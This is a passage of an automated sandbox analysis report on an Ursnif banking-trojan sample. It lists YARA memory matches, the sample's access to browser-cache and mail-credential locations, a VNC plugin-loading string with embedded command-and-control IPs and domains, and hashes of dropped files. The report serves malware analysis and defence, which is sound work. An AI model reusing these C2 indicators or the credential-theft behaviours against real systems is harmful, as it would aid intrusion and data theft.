Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

Yara detected Ursnif

Source: Yara match	File source: 00000000.00000003.683789524.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000003.843504876.000001A778130000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.683743665.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000003.852406498.0000000003190000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000027.00000002.914135566.000001B4FAD45000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.886882994.00000000009B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000002.857674347.00000284AA705000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.779793362.0000000002F7C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.683848326.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.683682102.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.856702650.0000000000FE5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000002.914614455.0000027D4F835000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.683714735.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.835757240.00000000009E0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.683763828.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.856122162.00000284AA500000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.683813516.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000003.826681690.000001D7C46A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.683833344.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 3424, type: MEMORY
Source: Yara match	File source: Process Memory Space: control.exe PID: 6752, type: MEMORY
Source: Yara match	File source: Process Memory Space: loaddll32.exe PID: 6536, type: MEMORY
Source: Yara match	File source: Process Memory Space: RuntimeBroker.exe PID: 3656, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 6476, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 5528, type: MEMORY

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\f_000008
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\f_000009
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\f_000007
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\f_00000a
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\f_00000b
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\index
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\data_0
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\data_1
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\data_2
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\data_3
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\f_000001
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\f_000004
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\f_000005
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\f_000002

Tries to steal Mail credentials (via file access)

Source: C:\Windows\explorer.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
Source: C:\Windows\explorer.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Remote Access Functionality:

Yara detected Ursnif

Source: Yara match	File source: 00000000.00000003.683789524.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000003.843504876.000001A778130000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.683743665.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000003.852406498.0000000003190000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000027.00000002.914135566.000001B4FAD45000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.886882994.00000000009B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000002.857674347.00000284AA705000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.779793362.0000000002F7C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.683848326.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.683682102.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.856702650.0000000000FE5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000002.914614455.0000027D4F835000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.683714735.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.835757240.00000000009E0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.683763828.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.856122162.00000284AA500000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.683813516.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000003.826681690.000001D7C46A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.683833344.0000000003178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 3424, type: MEMORY
Source: Yara match	File source: Process Memory Space: control.exe PID: 6752, type: MEMORY
Source: Yara match	File source: Process Memory Space: loaddll32.exe PID: 6536, type: MEMORY
Source: Yara match	File source: Process Memory Space: RuntimeBroker.exe PID: 3656, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 6476, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 5528, type: MEMORY

Contains VNC / remote desktop functionality (version string found)

Source: control.exe, 00000020.00000003.854967978.000001A77A0DC000.00000004.00000040.sdmp	String found in binary or memory: \| LOAD_PLUGIN = file://c:\test\vnc32.dll, file://c:\test\vnc64.dll
Source: RuntimeBroker.exe, 00000021.00000002.914359235.0000027D4F702000.00000004.00000001.sdmp	String found in binary or memory: GET_SYSINFO \| LOAD_PLUGIN = file://c:\test\vnc32.dll, file://c:\test\vnc64.dll
Source: RuntimeBroker.exe, 00000021.00000002.914359235.0000027D4F702000.00000004.00000001.sdmp	String found in binary or memory: updates5.microsoft.com store.avast.com 185.219.221.184 prokladuslop2.xyz 185.219.221.212 185.219.221.225 prokladuslop1.xyz107.174.86.134 107.175.127.2210ipinfo.io/ip api.wipmania.com curlmyip.net1210291029JSJUYNHG130030030030030010765760GET_SYSINFO \| LOAD_PLUGIN = file://c:\test\vnc32.dll, file://c:\test\vnc64.dll
Source: rundll32.exe, 00000023.00000002.858020344.00000284AAD0C000.00000004.00000040.sdmp	String found in binary or memory: GET_SYSINFO \| LOAD_PLUGIN = file://c:\test\vnc32.dll, file://c:\test\vnc64.dll
Source: rundll32.exe, 00000023.00000002.858020344.00000284AAD0C000.00000004.00000040.sdmp	String found in binary or memory: updates5.microsoft.com store.avast.com 185.219.221.184 prokladuslop2.xyz 185.219.221.212 185.219.221.225 prokladuslop1.xyz107.174.86.134 107.175.127.2210ipinfo.io/ip api.wipmania.com curlmyip.net1210291029JSJUYNHG130030030030030010765760GET_SYSINFO \| LOAD_PLUGIN = file://c:\test\vnc32.dll, file://c:\test\vnc64.dll
Source: RuntimeBroker.exe, 00000027.00000002.914895977.000001B4FB202000.00000004.00000001.sdmp	String found in binary or memory: GET_SYSINFO \| LOAD_PLUGIN = file://c:\test\vnc32.dll, file://c:\test\vnc64.dll
Source: RuntimeBroker.exe, 00000027.00000002.914895977.000001B4FB202000.00000004.00000001.sdmp	String found in binary or memory: updates5.microsoft.com store.avast.com 185.219.221.184 prokladuslop2.xyz 185.219.221.212 185.219.221.225 prokladuslop1.xyz107.174.86.134 107.175.127.2210ipinfo.io/ip api.wipmania.com curlmyip.net1210291029JSJUYNHG130030030030030010765760GET_SYSINFO \| LOAD_PLUGIN = file://c:\test\vnc32.dll, file://c:\test\vnc64.dll

ID:	322850
Product:	CloudBasic
Start time:	01:29:15
Start date:	26.11.2020
Sample:	https___purefile24.top_4352wedfoifom.php
Cookbook:	default.jbs
System description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Architecture:	WINDOWS
MD5:	e221c9a4b1ac13310d037cbc764b86d9
SHA1:	a7dbb7283b3b164993c1c122189e42509fe5573d
SHA256:	6b1e27915fa85d6bde40c512865e57c555e7bb02f1dc192a9b827c74c8984780
Filetype:	Win32 Dynamic Link Library (generic) (1002004/3) 98.32%

Name	Type	MD5	SHA1	SHA256
C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_loaddll32.exe_5c36891a17d80e76ac9661865237f76ab3b96fe_f2262bc1_19f3d1d1\Report.wer	Little-endian UTF-16 Unicode text, with CRLF line terminators	82D81F82BB5F161F3EF251DA90CEB1C2	851402A67DB9ABC10C40E0CA6244F2C56557B3BE	2A69CE06D418C20901AD560B93560DBE7648C844F1FC4A9BB7AB8407E5D28398
C:\ProgramData\Microsoft\Windows\WER\Temp\WERAFD1.tmp.dmp	Mini DuMP crash report, 15 streams, Thu Nov 26 00:31:46 2020, 0x1205a4 type	D0DF79DB9FCFAD7690655BE64E23B87F	658BC22F805341C5051993E41263C9DEB1510390	8B7BF0B7D39288F38CAA29240C02E1ECD4F59038F751F169D7A6F726B6F2FD74
C:\ProgramData\Microsoft\Windows\WER\Temp\WERB716.tmp.WERInternalMetadata.xml	XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators	F9FB9B84510B41011BA1520D1AE6A5CF	4BAB64FE5847240C30D1A7F973034842D6720C29	0F0586C5D290285432EB2BDBB0E3522B2780BA431D72755B2B58F03E55747611
C:\ProgramData\Microsoft\Windows\WER\Temp\WERBA91.tmp.xml	XML 1.0 document, ASCII text, with CRLF line terminators	4218FB51421683A4DDFC8F83050E8721	85C562054C6F5231F82EEE0F23C504C82DBC2C33	4BA5DC5A4A02FD59D3D6A174F6F8E43BD371A6D42B8C06CB0801A4453B059E03
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{8E9E2BBA-2F7E-11EB-90EB-ECF4BBEA1588}.dat	Microsoft Word Document	A057CB53AF5206CA4B21282FD8015265	4216B5B681F313BC9DD08E99CFEDD0B744230F9D	17C6ACC8D09A8906FABEA19AD46FB1F1A666C908955BBD0350DBB81F1652C458
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{A8EB16E1-2F7E-11EB-90EB-ECF4BBEA1588}.dat	Microsoft Word Document	AC8E06B67F44790E4E8F38F7DB8A06BD	17FA9FC7EC5F8EEEA497B4D4FB814A0510F1DA65	C857B05126FFA0BC811D1ACB23B08F5BA2AE8307F748E1C3A7A0320AA5D2A6A9
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{8E9E2BBC-2F7E-11EB-90EB-ECF4BBEA1588}.dat	Microsoft Word Document	3B4C851D23ECFEEED314F42E31B65905	CC264E5829CE13D406A389C3280CF84C422A5C06	DA69BCA4D86FAE8EBD5064CB36CE333215B425804A57C395748E6A4F71DDA0D6
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{A8EB16E3-2F7E-11EB-90EB-ECF4BBEA1588}.dat	Microsoft Word Document	023CFAC5DBB6020979EBDCEE779A8211	04DE1B108DD42596B370FCA39D86A84AE935A860	AC48BC89C96CE9BDCCBEB5D3C7FB237639FD2BEC411EB8AACCB99C6A37DDA600
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{A8EB16E5-2F7E-11EB-90EB-ECF4BBEA1588}.dat	Microsoft Word Document	F87A8BC6E7CF04DD81D0480B1A69060E	2343288C86A88623554F1FD581E207C9EE96D9B3	CE5F9CA382065E3191FA41C22BE0BE29954435DD859755DD9D3A783B5CC8E01A
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{A8EB16E7-2F7E-11EB-90EB-ECF4BBEA1588}.dat	Microsoft Word Document	90E2EA2640CB6D975909CD0E120B4804	51946371537A284A8C3416EF1F36135CFF9A9A3B	46316EF1DEC01E8B55DE6FF4C8A436433B03DE23D8F0BC5A05C0E42C50B11CE8
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-17529550060\msapplication.xml	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators	504BE96DF70C4859EAE49FC0DCDCCB8A	7D82FA19B7CF7D06CEC29E3C02AA2D2C36DED407	16CBA7FD099345CF713A0EF446CAF612020F7734F58E17A496B54E9A903F3EF1
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-18270793970\msapplication.xml	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators	EFE080215C5821BD5FDF487F0890D9C8	B9B44E5613168DD576B5286FA70253110BBC4EF9	3F7F2D62FA98CE46A26C7CC2CCF39EFC8CC65CB4EE864E6507FEA6ADF139DB92
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-21706820\msapplication.xml	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators	E99CF2B8ADBDF3A8C895B86B80E06C74	CCC6ED6892E33E35965B592C7927451D0BC5CA58	5D51C3B36AA7AAB0DF19E3E533CF449D0437A872467F5B070605828A125BB4A6
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-4759708130\msapplication.xml	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators	6B063EDA5B544269E8618D85CF165C78	0473D7AAC2CAA2FE2C1583612F6E276580797470	A503CD754288A31B547FC4F1AE10D7FDC2DE4AB7931CCC3C903237916625B468
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-6757900\msapplication.xml	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators	34947F7E7EE6DF59B8F85977EACE5C95	14E96A5ECFB423F0E61D9E7CED8B6DA2B7D36CF9	69DFE958AF2FD3AAA46D544E5195F5FA94B8C933BA91AE8CCFFA58C9DA141D1F
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-8760897390\msapplication.xml	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators	A76CB355A6478812041BE9992418BAAC	84E1146551C1A697ECBB0624957CFDFB7FC8C565	4DAB19169B916D8A995381E693E61CCB3EB4BCB65A1C3CB82217BB4D960497D8
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin20259167780\msapplication.xml	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators	1B21BCFC4BEB3FC32DC4B0A5D83113CF	9EEB9A246087171417E99B3F9E5567E23833B253	1C5EFFAE980B8C9D2FF82037304D68D3305712ECF095392577FD3C84D9F67210
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin20332743330\msapplication.xml	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators	A264E8261581266A559E57A8807D1801	D39F1A8E033D0B89D5F241E54D8E833814B5D0BA	C367C8BE906F9985FBA726ADC6F569529F744A3E7579CC51F224BCC565D30247
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin8215062560\msapplication.xml	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators	EA2C83646D5686E8698B4A4157DA8A95	76952E054648D88C511B2F2E6738E3C1AB282D4C	2D59EDB5EC0DC41AEB79EE0ECDB83BCA12E7A3AB8883AB6F41E3C17F6E734F96
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\imagestore\gee00pr\imagestore.dat	data	7CB0B0AB6E8AB6E5FCA32C18F0C28B72	549802D1FEE79EDDB246E676BC6C692F7D68E120	A559C47165BC67FC87B4A9A27132E670B3F9FA38D19472CEF36F84F3DB645B29
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\dnserror[1]	HTML document, UTF-8 Unicode (with BOM) text, with CRLF line terminators	2DC61EB461DA1436F5D22BCE51425660	E1B79BCAB0F073868079D807FAEC669596DC46C1	ACDEB4966289B6CE46ECC879531F85E9C6F94B718AAB521D38E2E00F7F7F7993
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\down[1]	PNG image data, 15 x 15, 8-bit colormap, non-interlaced	C4F558C4C8B56858F15C09037CD6625A	EE497CC061D6A7A59BB66DEFEA65F9A8145BA240	39E7DE847C9F731EAA72338AD9053217B957859DE27B50B6474EC42971530781
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\FhJZ[1].htm	ASCII text, with very long lines, with no line terminators	501A880E10CF735C96413C6C5DBC9C89	677F92E5D082A7792AF30681C626AE4A920AA67B	FF1B592DE544D3DED49060D18CB006359C161158A291D0F9E4C0A52D4A1B2BDD
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\errorPageStrings[1]	UTF-8 Unicode (with BOM) text, with CRLF line terminators	D65EC06F21C379C87040B83CC1ABAC6B	208D0A0BB775661758394BE7E4AFB18357E46C8B	A1270E90CEA31B46432EC44731BF4400D22B38EB2855326BF934FE8F1B169A4F
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\uVs[1].htm	ASCII text, with very long lines, with no line terminators	3C31070D8B5C90E2BF19147B1128894C	415553F00F6FEB865B46334581504DCD32669800	E662196FF655BAA084CF7818FB48E8B6E1EB56C7F7EFC48B38347E672AA36123
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\httpErrorPagesScripts[1]	UTF-8 Unicode (with BOM) text, with CRLF line terminators	9234071287E637F85D721463C488704C	CCA09B1E0FBA38BA29D3972ED8DCECEFDEF8C152	65CC039890C7CEB927CE40F6F199D74E49B8058C3F8A6E22E8F916AD90EA8649
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\NewErrorPageTemplate[1]	UTF-8 Unicode (with BOM) text, with CRLF line terminators	DFEABDE84792228093A5A270352395B6	E41258C9576721025926326F76063C2305586F76	77B138AB5D0A90FF04648C26ADDD5E414CC178165E3B54A4CB3739DA0F58E075
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\favicon[1].ico	MS Windows icon resource - 2 icons, 16x16, 32 bits/pixel, 32x32, 32 bits/pixel	F74755B4757448D71FDCB4650A701816	0BCBE73D6A198F6E5EBAFA035B734A12809CEFA6	E78286D0F5DFA2C85615D11845D1B29B0BFEC227BC077E74CB1FF98CE8DF4C5A
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\t[1].htm	ASCII text, with very long lines, with no line terminators	80AF159AABA2279B167081E6E81E6DE6	91C166F9EE0803CAC86A69C6F776B93CB7B989B4	A46183E81E4CFCE0BEBF166610E070BE25606F4DB9217C5F03E667E19620D0F0
C:\Users\user\AppData\Local\Microsoft\Windows\INetCookies\deprecated.cookie	ASCII text, with no line terminators	99BDE3452748E34D6C50275110A6A8D4	E79CB2A8DB7D8490523529D3861F95BA73A20C23	D07311ACF641866E7E84823D2962F593BB655792301DC61AD6F0C6869D9C5937
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache	data	7A57D8959BFD0B97B364F902ACD60F90	7033B83A6B8A6C05158BC2AD220D70F3E6F74C8F	47B441C2714A78F9CFDCB7E85A4DE77042B19A8C4FA561F435471B474B57A4C2
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	data	5629AA2E2ED9FB76D3139103D36B7023	204350589138FDA6E9442A0DE7188F91FB32F98C	2E3D93BF353C4E8A533BE3289D4BF4AEFC4308F52766C82791ED199A318C9E01
C:\Users\user\AppData\Local\Temp\550B.bin	ASCII text, with CRLF line terminators	83491A461E61C40F7F52FD9D85FD69E6	17A97FFDFC95F80CAF963AC3F414C1199490D755	76E12C0E0800598F615B203DEDD3B63808EE38B6356ACA8B34B57F1D2B6D7662
C:\Users\user\AppData\Local\Temp\5ycfw01g\5ycfw01g.0.cs	UTF-8 Unicode (with BOM) text	9374CDED96EE09456F8770891F7C7BB0	94A8FA474651BF57184B3D4303BE784BBEE0D3A1	2D22A87F2B278E4088D64A7B51BC202FB4FCC09335DFD0E9B1E3FA02C9708916
C:\Users\user\AppData\Local\Temp\5ycfw01g\5ycfw01g.cmdline	UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators	FC6723CF317254AE298E117A08FFA5E5	7EB7404BC5CC892D18DB2519CBAD2482762929E3	B37010456CF1F54DB42C318B8F79E49ED76DA13E2D24072A4E6A2132E5F5E5B9
C:\Users\user\AppData\Local\Temp\5ycfw01g\5ycfw01g.dll	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows	F626114212FE9424E3E9DE33997F67E1	7C2377A566F07020E2A58E9679926914B7B67FD8	9485576AC954FEEE2A555578E3ED38F323DE8A2288BE7BBD4B130CCF6925A499
C:\Users\user\AppData\Local\Temp\5ycfw01g\5ycfw01g.out	ASCII text, with CRLF, CR line terminators	83B3C9D9190CE2C57B83EEE13A9719DF	ABFAB07DEA88AF5D3AF75970E119FE44F43FE19E	B5D219E5143716023566DD71C0195F41F32C3E7F30F24345E1708C391DEEEFDA
C:\Users\user\AppData\Local\Temp\5ycfw01g\CSC315BF7D299C343BDBB661915DC5BF6A.TMP	MSVC .res	D567233501676EAAE70E1A3490E7EDEA	F90930FA7E097EE48A041C435840E4DA28459C33	5F078A0AB519F078AC32FA4BCA8ACDD0DB1AE9034A59D0EC347B27D1459AE2E1
C:\Users\user\AppData\Local\Temp\D245.bin	ASCII text, with CRLF line terminators	64D79BA55D95E5A6D104240A445757AF	8BB4CEA288003E02A8B4E6F04AF994DFBB001C16	12589FBC65B37724BF61D59DDD353EB349ECC7509BD83BF838FB30A4C3D4BBE0
C:\Users\user\AppData\Local\Temp\JavaDeployReg.log	ASCII text, with CRLF line terminators	6E2286D28C17A10B19E99C90C76BE26F	93FFCDDE9FB5D0CC5F889BE642E1F81F64D9EC71	5EF9E81B04DC63A4FC36CB6A5A59375E0B50CFCF900963BE893F4003204241BC
C:\Users\user\AppData\Local\Temp\RES4E97.tmp	data	6DBAD10FE981B42A57D18D5FF2DD1C56	54E9AD7E2809052A3878B353E40AEFA80DC475CE	88888A234D988854A55C356B84AD30878811A606AA2D3D756BDF12007695B3F1
C:\Users\user\AppData\Local\Temp\RES5D9B.tmp	data	6F2FEF21A0F36272BA9E88D8AC064A18	C289B88E0720DF1C8A138E3D4BF1B7A1A2F75F31	3B150FB86388D4BBF12965C7413A6E0451DF8AFF2B71A84F112C5E45C99BB134
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_t3qnb4jl.iyx.psm1	very short file (no magic)	C4CA4238A0B923820DCC509A6F75849B	356A192B7913B04C54574D18C28D46E6395428AB	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yfn00foi.1d0.ps1	very short file (no magic)	C4CA4238A0B923820DCC509A6F75849B	356A192B7913B04C54574D18C28D46E6395428AB	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
C:\Users\user\AppData\Local\Temp\xxfxarla\CSC41D1ABDD5ED14B1EB51F15F27222E36E.TMP	MSVC .res	B61BDFA7E8C9E5B74904E603759D0A2B	05D469FB9525BC12387272985086D5EC5B590495	BB57571BCD12C805E517C586AC4EA28DC027BB5DA03750AEBE9F845A41E6EA25
C:\Users\user\AppData\Local\Temp\xxfxarla\xxfxarla.0.cs	UTF-8 Unicode (with BOM) text	EB2D8DF6DBF541C77F5579AF967A24D2	0A54F84D62B331BB66E798E6AB03C226432A4620	4262A2B41845425832BD41961054DDB986DBC26824D7E948B983C6792E4A70C5
C:\Users\user\AppData\Local\Temp\xxfxarla\xxfxarla.cmdline	UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators	65773480B4F063EB440263048BA02E67	B9FEE5A0A4E64E715EDE1D8C50B3202B79C0BE24	75C650986D6C163C73BB9FF77A0E45E8A1AAF159E4D8CE3FCD23962B39EA7438
C:\Users\user\AppData\Local\Temp\xxfxarla\xxfxarla.dll	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows	978F1126B0145748BA3876F455722438	91177A3FF15976E2F021FB8BFACABBC9404D8E5E	A9FFAF5E3F9E2699D896615C5DEF62979A4DA54CF4E5498A6581CC789105BF38
C:\Users\user\AppData\Local\Temp\xxfxarla\xxfxarla.out	ASCII text, with CRLF, CR line terminators	83B3C9D9190CE2C57B83EEE13A9719DF	ABFAB07DEA88AF5D3AF75970E119FE44F43FE19E	B5D219E5143716023566DD71C0195F41F32C3E7F30F24345E1708C391DEEEFDA
C:\Users\user\AppData\Local\Temp\~DF4504015F5B500846.TMP	data	7D017E40804872A6967221F8FA8EA61C	618080468210C6C39FDDD278BD1932A4E3F2EEA3	0A218919221F4E2C87C37BA3E4202D38727D20C2101551847C1D5F0E60749D06
C:\Users\user\AppData\Local\Temp\~DF479DF3B05A4A00F7.TMP	data	0546A3AE865F45C39304809ACD799AB5	CD670DB6B70F9466246DE51954188687DCB8F828	55DEEDEB08F1874A1AB29975F57EC69F78D26D86710D9A40F7884B2DFA6537FC
C:\Users\user\AppData\Local\Temp\~DF8710D18D92ED7403.TMP	data	188451753A2B17C0512342E4E2ED0E4A	0D0F0AEEAF1D83AD80EC462A5935CB7C07582713	DD4C5FB7FCFCCE60255E4EB5BC77FF91B7A0CCFDB9837FBACC29B3603C272C0C
C:\Users\user\AppData\Local\Temp\~DF910CE8EC4F5B1959.TMP	data	CFA564F4924E2738262D051D935C5A3A	A60896D7A5F13EC2A71766DDC0BD0274047EEF89	FF0E57503F53FE644311C916730B720B65A071AA3CAC81FCEFF6B501CFE5BBBC
C:\Users\user\AppData\Local\Temp\~DFAD6E9A5E18A0DA50.TMP	data	95A731AE184C27EE29F97876B4DA93E1	73A42DF5C765EBA870EDC658629B2B7D6F3AEB3F	0D3AEAB84E5074CE95F78116B45C37C9CBED89B8C990E3CA8B0059DD3BBB759B
C:\Users\user\AppData\Local\Temp\~DFEA23B8285776BCFF.TMP	data	7BCF794D5C86278EE8489285CB1A09AE	F7BFD1B7F2CC37576648C826070FE6AA516742B5	B1031E28D65C657630334D6E9EF2F1BB20EAA1CB64C8CE3980EF6C67A62AB817
C:\Users\user\Documents\20201126\PowerShell_transcript.610930.b32Z8xp8.20201126013114.txt	UTF-8 Unicode (with BOM) text, with CRLF line terminators	D1058AABCCBD5E9E19341AFBF78C7952	EBEC89783A9B71C944893FF27E9EB4BD297E96EE	8226FC4E59B37776E7F504828250933B7F2FBAE09F6DC68D8835EA25B415CDE3

Analysis Report https___purefile24.top_4352wedfoifom.php

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection:

Spreading:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Private

Contacted Domains

Contacted URLs